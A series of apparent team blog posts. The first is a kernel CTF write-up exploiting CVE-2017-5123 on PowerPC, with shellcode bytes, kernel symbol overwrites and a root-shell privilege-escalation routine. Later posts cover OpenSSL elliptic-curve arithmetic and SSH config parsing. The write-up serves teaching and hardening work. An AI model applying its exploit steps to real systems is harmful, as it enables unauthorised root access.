  1. While this is conceptually what happens, the kernel can apply tricks to avoid the overhead of copying everything up front. For example, memory mappings apply copy-on-write (COW) to avoid duplicating all of the memory of the parent process. But from the point of view of the processes, it is no longer shared. 

  2. Or you could say that what we just called a 'process' is a thread, and the 'process' is really a process group initially containing a single thread. In the end it's semantics that don't really matter to the kernel though. Any thread/process can create more threads that can share resources with the parent. 

  3. Changing the active memory mapping has no immediate effect on the running code due to address space quadrants. In the hardware, the top two bits of a 64 bit effective address determine what memory mapping is applied to resolve it to a real address. If it is a userspace address (top two bits are 0) then the configured mapping is used. But if it is a kernel address (top two bits are 1) then the hardware always uses whatever mapping is in place for process ID 0 (the kernel knows this, so reserves process ID 0 for this purpose and does not allocate it to any userspace tasks). So our change to the memory mapping only applies once we return to userspace, or try to access memory through a userspace address (through get_user() and put_user()). The hypervisor has similar quadrant functionality, but different rules. 

Beginner's first kernel CTF with CVE-2017-5123

The other kind of kernel hacking

Instead of writing mitigations, memory protections and sanitisers all day, I figured it'd be fun to get the team to try playing for the other team. It's a fun set of skills to learn, and it's a very hands-on way to understand why kernel hardening is so important. To that end, I decided to concoct a simple kernel CTF and enforce some mandatory fun. Putting this together, I had a few rules:

  • it should be exploiting a real world vulnerability
  • it should be on Power (since that's what we do around here)
  • it should be conceptually simple to understand (and not require knowledge of network stacks or sandboxes etc)
  • it's more important to be educational than to be realistic

So I threw something together and I think it did a decent job of meeting those targets, so let's go through it!

Stage 1: the bug

SYSCALL_DEFINE5(waitid, int, which, pid_t, upid, struct siginfo __user *,
        infop, int, options, struct rusage __user *, ru)
{
    struct rusage r;
    struct waitid_info info = {.status = 0};
    long err = kernel_waitid(which, upid, &info, options, ru ? &r : NULL);
    int signo = 0;
    if (err > 0) {
        signo = SIGCHLD;
        err = 0;
    }

    if (!err) {
        if (ru && copy_to_user(ru, &r, sizeof(struct rusage)))
            return -EFAULT;
    }
    if (!infop)
        return err;

    user_access_begin();
    unsafe_put_user(signo, &infop->si_signo, Efault);
    unsafe_put_user(0, &infop->si_errno, Efault);
    unsafe_put_user((short)info.cause, &infop->si_code, Efault);
    unsafe_put_user(info.pid, &infop->si_pid, Efault);
    unsafe_put_user(info.uid, &infop->si_uid, Efault);
    unsafe_put_user(info.status, &infop->si_status, Efault);
    user_access_end();
    return err;
Efault:
    user_access_end();
    return -EFAULT;
}

This is the implementation of the waitid syscall in Linux v4.13, released in September 2017. For our purposes it doesn't matter what the syscall is supposed to do - there's a serious bug here that will let us do very naughty things. Try and spot it yourself, though it may not be obvious unless you're familiar with the kernel's user access routines.

#define put_user(x, ptr)                        \
({                                  \
    __typeof__(*(ptr)) __user *_pu_addr = (ptr);            \
                                    \
    access_ok(_pu_addr, sizeof(*(ptr))) ?               \
          __put_user(x, _pu_addr) : -EFAULT;            \
})

This is put_user() from arch/powerpc/include/asm/uaccess.h. The implementation goes deeper, but this tells us that the normal way the kernel would write to user memory involves calling access_ok() and only performing the write if the access was indeed OK (meaning the address is in user memory, not kernel memory). As the name may suggest, unsafe_put_user() skips that part, and for good reason - sometimes you want to do multiple user accesses at once. With SMAP/PAN/KUAP etc enabled, every put_user() will enable user access, perform its operation then disable it again, which is very inefficient. Instead, patterns like in waitid above are rather common - enable user access, perform a bunch of "unsafe" operations and then disable user access again.

The bug in waitid is that access_ok() is never called, and thus there is no validation that the user provided pointer *infop is pointing to user memory instead of kernel memory. Calling waitid and pointing into kernel memory allows unprivileged users to write into whatever they're pointing at. Neat! This is CVE-2017-5123, summarised as "Insufficient data validation in waitid allowed an user to escape sandboxes on Linux". It's a primitive that can be used for more than that, but that's what its discoverer used it for, escaping the Chrome sandbox.

If you're curious, there's a handful of different writeups exploiting this bug for different things that you can search for. I suppose I'm now joining them!

A tangent: API design

Failing to enforce that a user-provided address to write to is actually in userspace is a hefty mistake, one that wasn't caught until after the code made it all the way to a tagged release (though the only distro release I could find with it was Ubuntu 17.10-beta2). Linux is big, complicated, fast-moving, and all that - there's always going to be bugs. It's not possible to prevent the entire developer base from ever making mistakes, but you can design better APIs so mistakes like this are much less likely to happen.

Let's have a look at the waitid syscall implementation as it is in upstream Linux at the time of writing.

SYSCALL_DEFINE5(waitid, int, which, pid_t, upid, struct siginfo __user *,
        infop, int, options, struct rusage __user *, ru)
{
    struct rusage r;
    struct waitid_info info = {.status = 0};
    long err = kernel_waitid(which, upid, &info, options, ru ? &r : NULL);
    int signo = 0;

    if (err > 0) {
        signo = SIGCHLD;
        err = 0;
        if (ru && copy_to_user(ru, &r, sizeof(struct rusage)))
            return -EFAULT;
    }
    if (!infop)
        return err;

    if (!user_write_access_begin(infop, sizeof(*infop)))
        return -EFAULT;

    unsafe_put_user(signo, &infop->si_signo, Efault);
    unsafe_put_user(0, &infop->si_errno, Efault);
    unsafe_put_user(info.cause, &infop->si_code, Efault);
    unsafe_put_user(info.pid, &infop->si_pid, Efault);
    unsafe_put_user(info.uid, &infop->si_uid, Efault);
    unsafe_put_user(info.status, &infop->si_status, Efault);
    user_write_access_end();
    return err;
Efault:
    user_write_access_end();
    return -EFAULT;
}

Notice any differences? Not a lot has changed, but instead of an unconditional user_access_begin(), there's now a call to user_write_access_begin(). Not only have the user access functions been split into read and write (though whether there's actually read/write granularity under the hood depends on the MMU-specific implementation), but the _begin() function takes a pointer and the size of the write. And what do you think that's doing...

static __must_check inline bool
user_write_access_begin(const void __user *ptr, size_t len)
{
    if (unlikely(!access_ok(ptr, len)))
        return false;

    might_fault();

    allow_write_to_user((void __user *)ptr, len);
    return true;
}

That's right! The missing access_ok() check from v4.13 is now part of the API for enabling user access, so you can't forget it (without trying really hard). If there's something else you should be doing every time you call a function (i.e. access_ok() when calling user_access_begin()), it should probably just be part of the function, especially if there's a security implication.

This bug was fixed by adding in the missing access_ok() check, but it's very cool to see that bugs like this are now much less likely to get written.

Stage 2: the primitive

Before we do anything too interesting, we should figure out what we actually have here. We point our pointer at 0xc000000012345678 (an arbitrary kernel address) then take a look in gdb, revealing the following:

pwndbg> x/10 0xc000000012345678
0xc000000012345678:     17      0       1       0
0xc000000012345688:     2141    1001    1       0

So we know that we can at least set something to zero, and there's some potential for more mischief. We could fork() a lot to change the value of the PID to make our write a bit more arbitrary, but to not get too fancy I figured we should just see where we could get by setting something either to zero or to something non-zero.

A few targets came to mind. We could spray around where we think creds are located to try and overwrite the effective user ID of a process to 0, making it run as root. We could go after something like SELinux, aiming for flags like selinux_enabled and selinux_enforcing. I'm sure there's other sandbox-type controls we could try and escape from, too.

None of these were taking my CTF in the direction I wanted it to go (which was shellcode running in the kernel), so I decided to turn the realism down a notch and aim for exploiting a null pointer dereference. We'd map our shellcode to *0, induce a null pointer dereference in the kernel, and then our exploit would work. Right?

So we're just going to go for a classic privilege escalation. We start as an unprivileged user and end up as root. Easy.

Stage 3: the target

I found an existing exploit doing the same thing I wanted to do, so I just stole the target from that. It has some comments in French which don't really help me, but thankfully I found another version with some additional comments - in Chinese. Oh well. have_canfork_callback is a symbol that marks whether cgroup subsystems have a can_fork() callback that is checked when a fork is attempted. If we overwrite have_canfork_callback to be non-zero when can_fork is still NULL, then we win! We can reliably reproduce a null pointer dereference as soon as we fork().

I'm sure there's heaps of different symbols we could have hit, but this one has some nice properties. Any non-zero write is enough, we can trigger the dereference at a time in our control with fork(), and to cover our bases we can just set it back to 0 later.

In our case, we had debug info and a debugger, so finding where the symbol was located in memory is pretty easy. There's also /proc/kallsyms which is great if it's enabled. Linux on Power doesn't yet support KASLR which also saves us a headache or two here, and you can feel free to ask me why it's low on the priority list.

So now we have a null pointer dereference. Now let's get that doing something!

Stage 4: preparing the exploit

Virtual memory is one heck of a drug. If the kernel is going to execute from 0x0, we just need to mmap() to 0! Easy.

Well, it's not that easy. Turning any null pointer dereference into an easy attack vector is not ideal, so users aren't allowed to mmap to low address ranges, in our case, below PAGE_SIZE. Surely there's nothing in the kernel that would try to dereference a pointer + PAGE_SIZE? Maybe that's for a future CTF...

There's a sysctl for this, so in the actual CTF we just did sysctl -w vm.mmap_min_addr=0 and moved on for brevity. As I was writing this I decided to make sure it was possible to bypass this without cheating by making use of our kernel write primitive, and sure enough, it works! I had to zero out both mmap_min_addr and dac_mmap_min_addr symbols, the latter seemingly required for filesystem interactions to work post-exploit.

So now we can trigger a null pointer dereference in the kernel and we can mmap() our shellcode to 0x0, we should probably get some shellcode. We want to escalate our privileges, and the easiest way to do that is the iconic commit_creds(prepare_kernel_cred(0)).

prepare_kernel_cred() is intended to produce a credential for a kernel task. Passing 0/NULL gets you the same credential that init runs with, which is about as escalated as our privileges can get. commit_creds() applies the given credential to the currently running task - thus making our exploit run as root.

As of somewhat recently it's a bit more complex than that, but we're still back in v4.13, so we just need a way to execute that from a triggered null pointer dereference.

Stage 5: the shellcode

The blessing and curse of Power being a niche architecture is that it's hard to find existing exploits for. Perhaps lacking in grace and finesse, but effective nonetheless, is the shellcode I wrote myself:

    static const unsigned char shellcode[] = {
        0x00, 0x00, 0xc0, 0x3b, // li r30, 0
        0x20, 0x00, 0x9e, 0xe9, // ld r12,32(r30)
        0x00, 0x00, 0xcc, 0xfb, // std r30,0(r12)
        0x18, 0x00, 0x9e, 0xe9, // ld r12,24(r30)
        0xa6, 0x03, 0x89, 0x7d, // mtctr r12
        0x20, 0x04, 0x80, 0x4e, // bctr
    };

After the CTF I encouraged everyone to try writing their own shellcode and noone did, and I will take that as a sign that mine is flawlessly designed.

First we throw 0 into r30, which sounds like a register we'll get away with clobbering. We load an offset of 32 bytes from the value of r30 into r12 (and r30 is 0, so this is the address 32). Then, we store the value of r30 (which is 0) into the address in r12 - writing zero to the address found at *32.

Then, we replace the contents of r12 with the value contained at address 24. Then, we move that value into the count register, and branch to the count register - redirecting execution to the address found at *24.

I wrote it this way so participants would have to understand what the shellcode was trying to do to be able to get any use out of it. It expects two addresses to be placed immediately after it terminates and it's up to you to figure out what those addresses should be!

In our case, everyone figured out pretty quickly that *24 should point at our very classic privesc:

void get_root() {
    if (commit_creds && prepare_kernel_cred)
        commit_creds(prepare_kernel_cred(0));
}

Addresses for those kernel symbols need to be obtained first, but we're experts at that now. So we add in:

    *(unsigned long *)24 = (unsigned long)get_root;

And that part's sorted. How good is C?

Noone guessed what address we were zeroing, though, and the answer is have_canfork_callback. Without mending that, the kernel will keep attempting to execute from address 0, which we don't want. We only need it to do that once!

So we wrap up with

    *(unsigned long *)32 = have_canfork_callback;

and our shellcode's ready to go!

Stage 6: it doesn't work

We've had good progress so far - we needed a way to get the kernel to execute from address 0 and we found a way to do that, and we needed to mmap to 0 and we found a way to do that. And yet, running the exploit doesn't work. How come?

Unable to handle kernel paging request for instruction fetch
Faulting instruction address: 0x00000000
Oops: Kernel access of bad area, sig: 11 [#2]

The MMU has ended our fun. KUEP is enabled (SMEP on x86, PXN on ARM) so the MMU is enforcing that the kernel can't execute from user addresses. I gave everyone a bit of a trick question here - how can you get around this purely from the qemu command line?

The way I did it wasn't to parse nosmep (and I'm not even sure that was implemented for powerpc in v4.13 anyway), it was to change from -cpu POWER9 to -cpu POWER8. Userspace execution prevention wasn't implemented in the MMU until POWER9, so reverting to an older processor was a cheeky way to get around that.

Stage 7: victory!

Putting all of that together, we have a successful privilege escalation from attacking the kernel.

/ $ ./exploit 
Overwriting mmap_min_addr...
Overwriting dac_mmap_min_addr...
Overwriting have_canfork_callback...
Successfully acquired root shell!
/ # whoami
root

It's wild to think that even an exploit this simple would have been possible in the "real world" back in 2017, so it really highlights the value of kernel hardening! It made for a good introduction to kernel exploitation for me and my team and wasn't too contrived for the sake of simplicity.

Whether you're a beginner or an expert at kernel exploitation (or somewhere vaguely in the middle like me), I hope you found this interesting. There's lots of great PoCs, writeups and papers out there to learn from and CTFs to try if you want to learn more!

Going out on a Limb: Efficient Elliptic Curve Arithmetic in OpenSSL

So I've just managed to upstream some changes to OpenSSL for a new strategy I've developed for efficient arithmetic used in secp384r1, a curve prescribed by NIST for digital signatures and key exchange. In spite of its prevalence, its implementation in OpenSSL has remained somewhat unoptimised, even as less frequently used curves (P224, P256, P521) each have their own optimisations.

The strategy I have used could be called a 56-bit redundant limb implementation with Solinas reduction. Without too much micro-optimisation, we get ~5.5x speedup over the default (Montgomery Multiplication) implementation for creation of digital signatures.

How is this possible? Well first let's quickly explain some language:

Elliptic Curves

When it comes to cryptography, it's highly likely that those with a computer science background will be familiar with ideas such as key-exchange and private-key signing. The stand-in asymmetric cipher in a typical computer science curriculum is typically RSA. However, the heyday of Elliptic Curve ciphers has well and truly arrived, and their operation seems no less mystical than when they were just a toy for academia.

The word 'Elliptic' may seem to imply continuous mathematics. As a useful cryptographic problem, we fundamentally are just interested with the algebraic properties of these curves, whose points are elements of a finite field. Irrespective of the underlying finite field, the algebraic properties of the elliptic curve group can be shown to exist by an application of Bézout's Theorem. The group operator on points on an elliptic curve for a particular choice of field involves the intersection of lines intersecting either once, twice or thrice with the curve, granting notions of addition and doubling for the points of intersection, and giving the 'point at infinity' as the group identity. A closed form exists for computing a point double/addition in arbitrary fields (different closed forms can apply, but determined by the field's characteristic, and the same closed form applies for all large prime fields).

Our algorithm uses a field of the form \(\mathbb{F}_p\), that is the unique field with \(p\) (a prime) elements. The most straightforward construction of this field is arithmetic modulo \(p\). The other finite fields used in practise in ECC are of the form \(\mathbb{F}_{2^m}\) and are sometimes called 'binary fields' (representible as polynomials with binary coefficients). Their field structure is also used in AES through byte substitution, implemented by inversion modulo \(\mathbb{F}_{2^8}\).

From a performance perspective, great optimisations can be made by implementing efficient fixed-point arithmetic specialised to modulo by single prime constant, \(p\). From here on out, I'll be speaking from this abstraction layer alone.

Limbs

We wish to multiply two \(m\)-bit numbers, each of which represented with \(n\) 64-bit machine words in some way. Let's suppose just for now that \(n\) divides \(m\) neatly, then the quotient \(d\) is the minimum number of bits in each machine word that will be required for representing our number. Suppose we use the straightforward representation whereby the least significant \(d\) bits are used for storing parts of our number, which we better call \(x\) because this is crypto and descriptive variable names are considered harmful (apparently).

$$x = \sum_{k = 0}^{n-1} 2^{dk} l_k$$

If we then drop the requirement for each of our \(n\) machine words (also referred to as a 'limb' from hereon out) to have no more than the least significant \(d\) bits populated, we say that such an implementation uses 'redundant limbs', meaning that the \(k\)-th limb has high bits which overlap with the place values represented in the \((k+1)\)-th limb.

Multiplication (mod p)

The fundamental difficulty with making modulo arithmetic fast is to do with the following property of multiplication.

Let \(a\) and \(b\) be \(m\)-bit numbers, then \(0 \leq a < 2^m\) and \(0 \leq b < 2^m\), but critically we cannot say the same about \(ab\). Instead, the best we can say is that \(0 \leq ab < 2^{2m}\). Multiplication can in the worst case double the number of bits that must be stored, unless we can reduce modulo our prime.

If we begin with non-redundant, 56-bit limbs, then for \(a\) and \(b\) not too much larger than \(2^{384} > p_{384}\) that are 'reduced sufficiently' then we can multiply our limbs in the following ladder, so long as we are capable of storing the following sums without overflow.

    /* and so on ... */

    out[5] = ((uint128_t) in1[0]) * in2[5]
           + ((uint128_t) in1[1]) * in2[4]
           + ((uint128_t) in1[2]) * in2[3]
           + ((uint128_t) in1[3]) * in2[2]
           + ((uint128_t) in1[4]) * in2[1]
           + ((uint128_t) in1[5]) * in2[0];

    out[6] = ((uint128_t) in1[0]) * in2[6]
           + ((uint128_t) in1[1]) * in2[5]
           + ((uint128_t) in1[2]) * in2[4]
           + ((uint128_t) in1[3]) * in2[3]
           + ((uint128_t) in1[4]) * in2[2]
           + ((uint128_t) in1[5]) * in2[1]
           + ((uint128_t) in1[6]) * in2[0];

    out[7] = ((uint128_t) in1[1]) * in2[6]
           + ((uint128_t) in1[2]) * in2[5]
           + ((uint128_t) in1[3]) * in2[4]
           + ((uint128_t) in1[4]) * in2[3]
           + ((uint128_t) in1[5]) * in2[2]
           + ((uint128_t) in1[6]) * in2[1];

    out[8] = ((uint128_t) in1[2]) * in2[6]
           + ((uint128_t) in1[3]) * in2[5]
           + ((uint128_t) in1[4]) * in2[4]
           + ((uint128_t) in1[5]) * in2[3]
           + ((uint128_t) in1[6]) * in2[2];

    /* ... and so forth */

This is possible, if we back each of the 56-bit limbs with a 64-bit machine word, with products being stored in 128-bit machine words. The numbers \(a\) and \(b\) were able to be stored with 7 limbs, whereas we use 13 limbs for storing the product. If \(a\) and \(b\) were stored non-redundantly, than each of the output (redundant) limbs must contain values less than \(6 \cdot 2^{56} \cdot 2^{56} < 2^{115}\), so there is no possibility of overflow in 128 bits. We even have room spare to do some additions/subtractions in cheap, redundant limb arithmetic.

But we can't keep doing our sums in redundant limb arithmetic forever, we must eventually reduce. Doing so may be expensive, and so we would rather reduce only when strictly necessary!

Solinas-ish Reduction

Our prime is a Solinas (Pseudo/Generalised-Mersenne) Prime. Mersenne Primes are primes expressible as \(2^m - 1\). This can be generalised to low-degree polynomials in \(2^m\). For example, another NIST curve uses \(p_{224} = 2^{224} - 2^{96} + 1\) (a 224-bit number) where \(p_{224} = f(2^{32})\) for \(f(t) = t^7 - t^3 + 1\). The simpler the choice of polynomial, the simpler the modular reduction logic.

Our choice of \(t\) is \(2^{56}\). Wikipedia the ideal case for Solinas reduction where the bitwidth of the prime is divisible by \(\log_2{t}\), but that is not our scenario. We choose 56-bits for some pretty simple realities of hardware. 56 is less than 64 (standard machine word size) but not by too much, and the difference is byte-addressible (\(64-56=8\)). Let me explain:

Just the Right Amount of Reduction (mod p)

Let's first describe the actual prime that is our modulus.

$$p_{384} = 2^{384} - 2^{128} - 2^{96} + 2^{32} - 1$$

Yuck. This number is so yuck in fact, that noone has so far managed to upstream a Solinas' reduction method for it in OpenSSL, in spite of secp384r1 being the preferred curve for ECDH (Elliptic Curve Diffie-Hellman key exchange) and ECDSA (Elliptic Curve Digital Signature Algorithm) by NIST.

In 56-bit limbs, we would express this number so:

Let \(f(t) = 2^{48} t^6 - 2^{16} t^2 - 2^{40} t + (2^{32} - 1)\), then observe that all coefficients are smaller than \(2^{56}\), and that \(p_{384} = f(2^{56})\).

Now let \(\delta(t) = 2^{16} t^2 + 2^{40} t - 2^{32} + 1\), consider that \(p_{384} = 2^{384} - \delta(2^{56})\), and thus \(2^{384} \equiv \delta(2^{56}) \mod{p_{384}}\). From now on let's call \(\delta(2^{56})\) just \(\delta\). Thus, 'reduction' can be achieved as follows for suitable \(X\) and \(Y\):

$$ab = X + 2^{384} Y \equiv X + \delta Y \mod{p_{384}}$$

Calculating \(\delta Y\)

First Substitution

First make a choice of \(X\) and \(Y\). The first thing to observe here is that this can actually be made a large number of ways! We choose:

$$X_1 = \sum_{k=0}^8\texttt{in[k]} t^k$$
$$Y_1 = 2^8 t^2 \sum_{k=9}^{12}\texttt{in[k]} t^{k-9} = 2^8 \sum_{k=9}^{12}\texttt{in[k]} t^{k-7}$$

'Where does the \(2^8 t^{2}\) come from?' I hear you ask. See \(t^9 = t^2 \cdot t^7 = t^2 (2^8 \cdot 2^{384}) \equiv (2^8 t^2) \delta \mod{f(t)}\). It's clear to see that the place value of in[9] ... in[12] is greater than \(2^{384}\).

I'm using the subscripts here because we're in fact going to do a series of these reductions to reach a suitably small answer. That's because our equation for reducing \(t^7\) terms is as follows:

$$t^7 \equiv 2^8\delta \equiv 2^{24} t^2 + 2^{48} t + (-2^{40} + 2^8) \mod{f(t)}$$

Thus reducing in[12] involves computing:

$$\texttt{in[12]} t^{12} = \texttt{in[12]} (t^5)(t^7) \equiv 2^8\delta \cdot \texttt{in[12]} t^5 \mod{f(t)}$$

But \(\delta\) is a degree two polynomial, and so our numbers can still have two more limbs than we would want them to have. To be safe, let's store \(X_1 + \delta Y_1\) in accumulator limbs acc[0] ... acc[8] (this will at first appear to be one more limb than necessary), then we can eliminate in[12] with the following logic.

    /* assign accumulators to begin */
    for (int i = 0; i < 9; i++)
        acc[i] = in[i];

    /* X += 2^128 Y */
    acc[8] += in[12] >> 32;
    acc[7] += (in[12] & 0xffffffff) << 24;

    /* X += 2^96 Y */
    acc[7] += in[12] >> 8;
    acc[6] += (in[12] & 0xff) << 48;

    /* X += (-2^32 + 1) Y */
    acc[6] -= in[12] >> 16;
    acc[5] -= ((in[12] & 0xffff) << 40);
    acc[6] += in[12] >> 48;
    acc[5] += (in[12] & 0xffffffffffff) << 8;

Notice that for each term in \(\delta = 2^{128} + 2^{96} + (2^{32} - 1)\) we do two additions/subtractions. This is in order to split up operands in order to minimise the final size of numbers and prevent over/underflows. Consequently, we need an acc[8] to receive the high bits of our in[12] substitution given above.

Second Substitution

Let's try and now eliminate through substitution acc[7] and acc[8]. Let

$$X_2 = \sum^{6}_{k=0}\texttt{acc[k]}t^k $$
$$Y_2 = 2^8(\texttt{acc[7]} t^7 + \texttt{acc[8]} t^8)$$

But this time, \(\delta Y_2\) is a number that comfortably can take up just five limbs, so we can update acc[0], ..., acc[5] comfortably in-place.

Third Substitution

Finally, let's reduce all the high bits of in[6]. Since in[6] has place value \(t^6 = 2^{336}\), thus we wish to reduce all but the least significant \(384 - 336 = 48\) bits.

A goal in designing this algorithm is to ensure that acc[6] has as tight a bound as reasonably possible. Intuitively, if we can cause acc[6] to be as large as possible by absorbing the high bits of lower limbs, we reduce the number of bits that must be carried forward later on. As such, we perform a carry of the high-bits of acc[4], acc[5] into acc[6] before we begin our substitution.

Again, let

$$X_3 = \sum^{5}_{k=0}\texttt{acc[k]}t^k + (\texttt{acc[6]} \text{(low bits)})t^6$$
$$Y_3 = 2^{48}(\texttt{acc[6]} \text{(high bits, right shifted)}) t^6$$

The equation for eliminating \(2^{48}t^6\) is pretty straightforward:

$$2^{384} = 2^{48}t^6 \equiv 2^{16}t^2 + 2^{40}t + (-2^{32} + 1) \mod{f(t)}$$

Carries

Finally, as each of acc[0], ..., acc[6] can contain values larger than \(2^{56}\), we carry their respective high bits into acc[6] so as to remove any redundancy. Conveniently, our preemptive carrying before the third substitution has granted us a pretty tight bound on our final calculation - the final reduced number has the range \([0, 2^{384}]\).

Canonicalisation

This is 'just the right amount of reduction' but not canonicalisation. That is, since \(0 < p_{384} < 2^{384}\), there can be multiple possible reduced values for a given congruence class. felem_contract is a method which uses the fact that \(0 \leq x < 2 p_{384}\) to further reduce the output of felem_reduce into the range \([0, p_{384})\) in constant time.

This code has many more dragons I won't explain here, but the basic premise to the calculations performed there is as follows:

Given a 385 bit input, checking whether our input (expressed as a concatenation of bits) \(b_{384}b_{383} \ldots b_1b_0\) is greater than or equal to \(p_{384}\) whose bits we denote \(q_{384}, \ldots, q_0\) (\(q_{384} = 0\)) is determined by the following logical predicate (\(G(384)\)):

$$G(k) \equiv (b_k \land \lnot q_k) \lor ((b_k = q_k) \land G(k-1))$$
$$G(0) \equiv b_k = q_k$$

With \(p_{384}\) being a Solinas'/Pseudo-Mersenne Prime, it has a large number of contiguous runs of repeated bits, so we can of course use this to massively simplify our predicate. Doing this in constant time involves some interesting bit-shifting/masking schenanigans. Essentially, you want a bit vector of all ones/zeros depending on the value of \(G(384)\), we then logically 'and' with this bitmask to 'conditionally' subtract \(p_{384}\) from our result.

A Side Note about the Weird Constants

Okay so we're implementing our modular arithmetic with unsigned integer limbs that together represent a number of the following form:

$$x = \sum_{k = 0}^{n-1} 2^{dk} l_k$$

How do we then do subtractions in a way which will make overflow impossible? Well computing \(a - b\) is really straightforward if every limb of \(a\) is larger than every limb of \(b\). We then add a suitable multiple of \(p_{384}\) to \(a\) that causes each limb of \(a\) to be sufficiently large.

Thankfully, with redundant-limb arithmetic, we can do this easily by means of telescopic sums. For example, in felem_reduce we wanted all limbs of our \(p_{384}\) multiple to be sufficiently large. We overshot any requirement and provided such a multiple which gives a lower bound \(2^{123}\). We first scale our prime accordingly so that its 'lead term' (speaking in the polynomial representation) is \(2^{124}\).

$$2^{76} f(t) = 2^{124} t^6 - 2^{92} t^2 - 2^{116} t + (2^{108} - 2^{76}) t^0$$

Notice that most limbs of this multiple (the limbs will be the coefficients) are either too small or negative. We then transform this expression into a suitable telescopic sum. Observe that when \(t = 2^{56}\), \(2^{124} t^k = 2^{124-56}t^{k+1} = 2^{68} t^{k+1}\), and so simply introduce into each limb where required a \(2^{124}\) term by means of addition, subtracting the same number from a higher limb.

$$ \begin{align*} 2^{76} f(t) &= (2^{124} - 2^{68}) t^6 \\ &+ (2^{124} - 2^{68}) t^5 \\ &+ (2^{124} - 2^{68}) t^4 \\ &+ (2^{124} - 2^{68}) t^3 \\ &+ (2^{124} - 2^{92} - 2^{68}) t^2 \\ &+ (2^{124} - 2^{116} - 2^{68}) t \\ &+ (2^{124} + 2^{108} - 2^{76}) \end{align*} $$

We can then subtract values whose limbs are no larger than the least of these limbs above without fear of underflows providing us with an incorrect result. In our case, that upper bound for limb value is \(2^{124} - 2^{116} - 2^{68} > 2^{123}\). Very comfortable.

Concerning Timing Side-Channels

Cryptographic routines must perform all of their calculations in constant time. More specifically, it is important that timing cryptography code should not reveal any private keys or random nonces used during computation. Ultimately, all of our work so far has been to speed up field arithmetic in the modulo field with prime \(p_{384}\). But this is done in order to facilitate calculations in the secp384r1 elliptic curve, and ECDSA/ECDH each depend on being able to perform scalar 'point multiplication' (repeat application of the group operator). Since such an operation is inherently iterative, it presents the greatest potential for timing attacks.

We implement constant-time multiplication with the wNAF ladder method. This relies on pre-computing a window of multiples of the group generator, and then scaling and selectively adding multiples when required. Wikipedia provides a helpful primer to this method by cumulatively building upon more naive approaches.

Conclusion

While the resulting code borrows from and uses common language of Solinas reduction, ultimately there are a number of implementation decisions that were guided by heuristic - going from theory to implementation was far from cut-and-dry. The limb size, carry order, choice of substitutions as well as pre and post conditions made here are ultimately arbitrary. You could easily imagine there being further refinements obtaining a better result. For now, I hope this post serves to demystify the inner workings of ECC implementations in OpenSSL. These algorithms, although particular and sophisticated, need not be immutable.

Quirks of parsing SSH configs

Introduction

I've been using the VSCodium Open Remote - SSH extension recently to great results. I can treat everything as a single environment, without any worry about syncing between my local development files and the remote. This is very different to mounting the remote as a network drive and opening a local instance of VSCodium on it: in addition to crippling latency on every action, a locally mounted drive doesn't bring the build context that tools like clangd require (e.g., system headers).

Instead, the remote extension runs a server on the remote that performs most actions, and the local VSCodium instance acts as a client that buffers and caches data seamlessly, so the experience is nearly as good as developing locally.

For example, a project wide file search on a network drive is unusably slow because every file and directory read requires a round trip back to the remote, and the latency is just too large to finish getting results back in a reasonable time. But with the client-server approach, the client just sends the search request to the server for it to fulfil, and all the server has to do is send the matches back. This eliminates nearly all the latency effects, except for the initial request and receiving any results.

However there has been one issue with using this for everything: the extension failed to connect when I wasn't on the same network as the host machine. So I wasn't able to use it when working from home over a VPN. In this post we find out why this happened, and in the process look at some of the weird quirks of parsing an SSH config.

The issue

As above, I wasn't able to connect to my remote machines when working from home. The extension would abort with the following error:

[Error  - 00:23:10.592] Error resolving authority
Error: getaddrinfo ENOTFOUND remotename.ozlabs.ibm.com
    at GetAddrInfoReqWrap.onlookup [as oncomplete] (node:dns:109:26)

So it's a DNS issue. This would make sense, as the remote machine is not exposed to the internet, and must instead be accessed through a proxy. What's weird is that the integrated terminal in VSCodium has no problem connecting to the remote. So the extension seems to be doing something different than just a plain SSH connection.

You might think that the extension is not reading the SSH config. But the extension panel lists all the host aliases I've declared in the config, so it's clearly aware of the config at least. Possibly it doesn't understand the proxy config correctly? If it was trying to connect directly from the host, it would make sense to fail a DNS lookup.

Investigating

Enough theorising, time to debug the extension as it tries to connect.

From the error above, the string "Error resolving authority" looks like something I can search for. This takes me to the catch case for a large try-catch block. It could be annoying to narrow down which part of the block throws the exception, but fortunately debugging is as easy as installing the dependencies and running the pre-configured 'Extension' debug target. This opens a new window with the local copy of the extension active, and I can debug it in the original window.

In this block, there is a conditional statement on whether the ProxyJump field is present in the config. This is a good place to break on and see what the computed config looks like. If it doesn't find a proxy then of course it's going to run everything on the host.

And indeed, it doesn't think there is a proxy. This is progress, but why does the extension's view of the config not match up with what SSH does? After all, invoking SSH directly connects properly. Tracing back the source of the config in the extension, it ultimately comes from manually reading in and parsing the SSH config. When resolving the host argument it manually computes the config as per ssh_config(5). Yet somewhere it makes a mistake, because it doesn't include the ProxyJump field.

Parsing SSH config

To get to the bottom of this, we need to know the rules behind parsing SSH configs. The ssh_config(5) manpage does a pretty decent job of explaining this, but I'm going to go over the relevant information here. I reckon most people have a vague idea of how it works, and can write enough to meet their needs, but have never looked deeper into the actual rules behind how SSH parses the config.

  1. For starters, the config is parsed line by line. Leading whitespace (i.e., indentation) is ignored. So, while indentation makes it look like you are configuring properties for a particular host, this isn't quite correct. Instead, the Host and Match lines are special statements that enable or disable all subsequent lines until the next Host or Match.

    There is no backtracking; previous conditions and lines are not re-evaluated after learning more about the config later on.

  2. When a config line is seen, and is active thanks to the most recent Host or Match succeeding, its value is selected if it is the first of that config to be selected. So the earliest place a value is set takes priority; this may be a little counterintuitive if you are used to having the latest value be picked, like enable/disable command line flags tend to work.

  3. When HostName is set, it replaces the host value in Match matches. It is also used as the Host value during a final pass (if requested).

  4. The last behaviour of interest is the Match final rule. There are several conditions a Match statement can have, and the final rule says make this active on the final pass over the config.

Wait, final pass? Multiple passes? Yes. If final is a condition on a Match, SSH will do another pass over the entire config, following all the rules above. Except this time all the configs we read on the first pass are still active (and can't be changed). But all the Host and Matches are re-evaluated, allowing other configs to potentially be set. I guess that means rule (1) ought to have a big asterisk next to it.

Together, these rules can lead to some quirky behaviours. Consider the following config

Match host="*.ozlabs.ibm.com"
    ProxyJump proxy

Host example
    HostName example.ozlabs.ibm.com

If I run ssh example on the command line, will it use the proxy?

By rule (1), no. When testing the first Match host condition, our host value is currently example. It is not until we reach the HostName config that we start using example.ozlabs.ibm.com for these matches.

But by rule (4), the answer turns into maybe. If we end up doing a second pass over the config thanks to a Match final that could be anywhere else, we would now be matching example.ozlabs.ibm.com against the first line on the second go around. This will pass, and, since nothing has set ProxyJump yet, we would gain the proxy.

